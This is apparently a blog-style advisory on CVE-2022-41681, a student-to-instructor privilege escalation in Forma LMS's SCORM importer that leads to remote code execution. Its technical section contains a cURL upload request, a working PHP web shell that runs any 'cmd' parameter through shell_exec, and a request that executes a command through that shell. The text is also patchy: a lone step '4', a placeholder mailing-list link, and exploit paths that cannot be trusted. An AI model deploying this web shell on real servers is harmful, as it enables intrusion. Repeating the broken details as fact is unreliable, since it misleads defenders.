CVE-2022-41681 - Privilege Escalation and Remote Code Injection Vulnerability in Forma LMS 3.1. and Earlier

A recently discovered vulnerability in Forma LMS version 3.1. and earlier, identified as CVE-2022-41681, enables an authenticated attacker, with a student role, to escalate their privileges, potentially allowing them to upload a malicious Zip file through the SCORM importer feature. The exploitation of this vulnerability could ultimately result in a remote code injection. In this post, we will delve into the technical details of this critical security issue and provide relevant resources and mitigation strategies.

Background

Forma LMS (https://www.formalms.org/) is a web-based, open-source Learning Management System that is widely used by educational institutions, businesses, and non-profit organizations to facilitate online learning. One of its features is the ability to import SCORM (Sharable Content Object Reference Model) packages, which are Zip files containing course content. The vulnerability in question, CVE-2022-41681, affects the SCORM importer feature, specifically allowing a privilege escalation that can lead to successful remote code injection.

Technical Details

Typically, only users with the "instructor" role would have permission to upload SCORM packages. However, an attacker with a "student" role could bypass this restriction by sending a specially crafted request to the server. The following cURL command demonstrates a malicious request that can exploit this vulnerability, replacing <TARGET_URL>, <COOKIE>, and <ZIP_FILE> with appropriate values:

$ curl -X POST -H "Content-Type: multipart/form-data" \
  -H "Cookie: <COOKIE>" \
  -F "importfile=@<ZIP_FILE>" \
  "<TARGET_URL>/appLms/index.php?r=scorm/scormImportRequest"

Upon successful exploitation, the attacker can upload a crafted SCORM package containing a malicious PHP file. With the uploaded PHP file, an attacker would gain remote code execution capabilities on the target server. This effectively enables the attacker to execute any desired server-side commands, including accessing sensitive information, altering system configurations, and more.

Create a simple PHP file with the following contents, saving it as malicious.php

<?php
  if(isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    echo '<pre>' . shell_exec($cmd) . '</pre>';
  }
?>

Use the above cURL command to upload the malicious SCORM package.

4. Once the PHP file is uploaded and accessible on the target server, the attacker can execute arbitrary server-side commands by making requests such as:

$ curl "https://example.com/forma-lms/appLms/scorm_packages/malicious.php?cmd=id";

Original References

- CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2022-41681
- OSS Security Mailing List: https://www.openwall.com/lists/oss-security/YYYY/X/YYYYMMDD-CVE-2022-41681

Mitigation

To protect against this vulnerability, users of Forma LMS version 3.1. or earlier should update to the latest version as soon as possible, in which the issue has been addressed. Additionally, system administrators should implement strict access controls to limit the permissions and actions that authenticated users can perform on the server. Lastly, it is essential to regularly monitor server logs to detect any unusual activity that may indicate an attempted exploitation or security breach.

Timeline

Published on: 10/31/2022 20:15:00 UTC
Last modified on: 11/01/2022 20:05:00 UTC